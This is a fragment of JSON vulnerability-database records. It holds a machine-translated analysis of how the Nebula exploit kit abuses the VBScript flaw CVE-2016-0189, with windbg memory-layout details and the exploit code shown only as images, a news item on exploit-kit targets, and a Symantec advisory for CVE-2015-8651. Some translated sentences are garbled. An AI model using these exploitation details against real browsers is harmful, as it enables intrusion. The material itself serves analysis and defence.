["CVE-2018-8174", "CVE-2014-6332", "CVE-2016-0189", "CVE-2018-8373", "CVE-2017-0149"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994507", "href": "http://www.myhack58.com/Article/html/3/62/2019/94507.htm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-04-17T13:23:46", "edition": 2, "description": "1\\. Introduction \nIn recent years, exploit kits(EK/Exploit Kit)market amidst the winds of change\u3002 2016 early June, once rampant in the Angler EK disappeared, the Neutrino EK quickly filled the void. Then just less than 3 months time, the Neutrino EK and go for the underground, the RIG EK and then become the most popular exploit kits. This year 3 beginning of the month, RIG and fade out of sight, and ushered in a new Nebula EK. \nNebula EK package for CVE-2016-0189 exploits, than other exploit kits of exploit the top with some improvements here and conduct some in-depth analysis. \nThe tools used: \n\u2022 IE11(for debugging Javascript) \n\u2022 windbg \nNebula EK homepage, as shown below. \n\n! [](/Article/UploadPic/2017-4/2017417191740599. jpg? www. myhack58. com) \nNot difficult to see, the page contains a confusion of Javascript code. Further analysis of these codes, is there a sense of deja vu? By the way, the code to confuse the method with the sunset exploit kits(Sundown EK)are very similar. \nPage total 2 segment of Javascript code that confused the same way. The first paragraph of the Javascript code, removing the confusion, the code is as follows, is not difficult to see that this code is CVE-2016-0189 of exploits. \n\n! [](/Article/UploadPic/2017-4/2017417191740159. jpg? www. myhack58. com) \nAbout CVE-2016-0189, online there has been some analysis of the report, such as Theori analysis[1]. Fig. However, these analysis reports do not provide in-memory level of technical details, so that readers always kind of known it, of course, know why feel. This paper attempts to use windbg to analyze the exploitability of the vulnerability when the memory layout, so that the reader of the exploits have a deeper understanding. \n2\\. CVE-2016-0189 of the key knowledge point \nCVE-2016-0189 is a VBScript vulnerability. VBScript \u811a\u672c\u5f15\u64ce\u4ee3\u7801\u5728vbscript.dll . \n2.1. VBScript variables \nVBScript memory variables take up 0\u00d710 bytes, the first two bytes specify the variable type VARTYPE in. Common type definitions shown in the following table[2]\u3002 \n! [](/Article/UploadPic/2017-4/2017417191740973. jpg? www. myhack58. com) \nWe can be in VBScript code inserted into the IsEmpty()function, and then in windbg vbscript! The IsEmpty() function to set a breakpoint to observe the memory[3]. Fig. \n! [](/Article/UploadPic/2017-4/2017417191740850. jpg? www. myhack58. com) \nFigure 1 debugging VBScript code \n! [](/Article/UploadPic/2017-4/2017417191740851. jpg? www. myhack58. com) \nHere, 0a560198 is a str object, here 0008 two bytes indicates the VARTYPE, according to the table above, the value is exactly vbString(VT_BSTR = 8) and the offset 0\u00d78 storage is string address, \n! [](/Article/UploadPic/2017-4/2017417191740214. jpg? www. myhack58. com) \nHere also can be seen that the string is Unicode stored. \n2.2. VBScript array \nVBScript array is defined as follows \n! [](/Article/UploadPic/2017-4/2017417191740622. jpg? www. myhack58. com) \nWhen accessing the array elements, the VBScript engine will call AccessArray function to calculate the elements of the stored address. \nTry to use windbg to debug the following code, in vbscript! AccessArray at the following breakpoints: \n! [](/Article/UploadPic/2017-4/2017417191740745. jpg? www. myhack58. com) \n! [](/Article/UploadPic/2017-4/2017417191740615. jpg? www. myhack58. com) \nStack 0ab04380 is the array A Address \n! [](/Article/UploadPic/2017-4/2017417191740553. jpg? www. myhack58. com) \nThe array elements stored in the pvData (0x7dfd130) starting place \nIn the vbscript! AccessArray+0x9d: at the instruction of the stop (a different version of this offset value may differ) \n! [](/Article/UploadPic/2017-4/2017417191740754. jpg? www. myhack58. com) \nThis instruction is very crucial, it calculates the element A(1,2) address. Here esi is the SAFEARRAY address, and the esi+0c is pvData address. eax value is the element with respect to the pvData of the offset. View the eax value \n! [](/Article/UploadPic/2017-4/2017417191741274. jpg? www. myhack58. com) \nWhy A(1,2)the offset will be 0\u00d750. VBScript array memory layout and C language some not too same. A array of the memory layout of A(0,0) A(1,0) A(0, 1), A(1,1), A(0, 2), A(1,2), and each element size is 0\u00d710 bytes(cbElements)\u3002 Therefore A(1,2) offset 0\u00d750 in. \n2.3. CVE-2016-0189 vulnerability of the principle of the century \nCVE-2016-0189 vulnerability in AccessArray function code. We look at this function logic: \n\n! [](/Article/UploadPic/2017-4/2017417191741689. jpg? www. myhack58. com)\n\n**[1] [[2]](<85342_2.htm>) [[3]](<85342_3.htm>) [next](<85342_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-17T00:00:00", "type": "myhack58", "title": "Nebula exploit package CVE-2016-0189 exploit analysis-exploit warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189"], "modified": "2017-04-17T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/85342.htm", "id": "MYHACK58:62201785342", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-09T17:47:57", "edition": 2, "description": "By RecordedFuture a new study suggests that, due to its vulnerability, Flash Player will continue to the global computer at risk, cybercriminals are still looking for the Adobe solutions among the security flaws to the invasion of the computer. This year the exploit kit used by the top 10 vulnerabilities in a total of 6 vulnerabilities from Adobe Flash Player, one of the security vulnerabilities is more than 7 exploit Kit the use. \nInternet Explorer, Windows and Silverlight are also the exploitability of the vulnerability of the target, in the Microsoft browser, find the security vulnerability CVE-2016-0189 is a network for criminals to exploit most of the vulnerabilities. Microsoft IE browser is Magnitude, the Neutrino, the RIG and the Sundown and other exploit kits as an attack target, and the Angler, the Magnitude, the Neutrino, the RIG, the Nuclear Pack and Spartan and other exploit kits are using the Flash Player vulnerability to attack. \nAdobe number for CVE-2015-7645 vulnerability is particularly affected by attack kit developers attention, because it affects not only Windows, but also affecting Mac and Linux systems. It can be used to control an affected system. In addition, this is the Adobe After the introduction of new security mechanisms found after the first zero-day vulnerabilities, and therefore, very quickly by hackers. \nRecordedFuture shows, these software solutions in the presence of all vulnerabilities must as soon as possible by updating the repair, and suggested that if the user does not affect the key business processes, please delete the Affected Software. As for Internet Explorer users, the company said, it is best to consider the Chrome browser, because Google's Project Zero scheme has been concerned in the Chrome which patched the Flash Player vulnerability, but at the same time, Microsoft also promised by Windows 10, The New Edge browser provides extra security. \n! [](/Article/UploadPic/2016-12/120161209025704.jpg)\n", "cvss3": {}, "published": "2016-12-09T00:00:00", "type": "myhack58", "title": "Security researchers found that attack kits favorite Flash Player security vulnerabilities-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2015-7645"], "modified": "2016-12-09T00:00:00", "id": "MYHACK58:62201681902", "href": "http://www.myhack58.com/Article/html/3/62/2016/81902.htm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2021-06-08T18:45:42", "description": "### Description\n\nAdobe Flash Player and AIR are prone to an unspecified integer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 15.0.0.293 \n * Adobe AIR 15.0.0.356 \n * Adobe AIR 16.0.0.245 \n * Adobe AIR 16.0.0.272 \n * Adobe AIR 17.0.0.144 \n * Adobe AIR 17.0.0.172 \n * Adobe AIR 18.0.0.143 \n * Adobe AIR 18.0.0.144 \n * Adobe AIR 18.0.0.180 \n * Adobe AIR 18.0.0.199 \n * Adobe AIR 19.0.0.190 \n * Adobe AIR 19.0.0.213 \n * Adobe AIR 19.0.0.241 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 20.0.0.204 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3650 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n * Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 \n * Adobe AIR 3.9.0.1030 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 15.0.0.302 \n * Adobe AIR SDK 15.0.0.356 \n * Adobe AIR SDK 16.0.0.272 \n * Adobe AIR SDK 17.0.0.144 \n * Adobe AIR SDK 17.0.0.172 \n * Adobe AIR SDK 18.0.0.143 \n * Adobe AIR SDK 18.0.0.144 \n * Adobe AIR SDK 18.0.0.180 \n * Adobe AIR SDK 18.0.0.199 \n * Adobe AIR SDK 19.0.0.190 \n * Adobe AIR SDK 19.0.0.213 \n * Adobe AIR SDK 19.0.0.241 \n * Adobe AIR SDK 20.0.0.204 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Gentoo Linux \n * Microsoft Edge \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE openSUSE Evergreen 11.4 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-12-28T00:00:00", "type": "symantec", "title": "Adobe Flash Player and AIR CVE-2015-8651 Unspecified Integer Overflow Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-8651"], "modified": "2015-12-28T00:00:00", "id": "SMNTC-79705", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/79705", 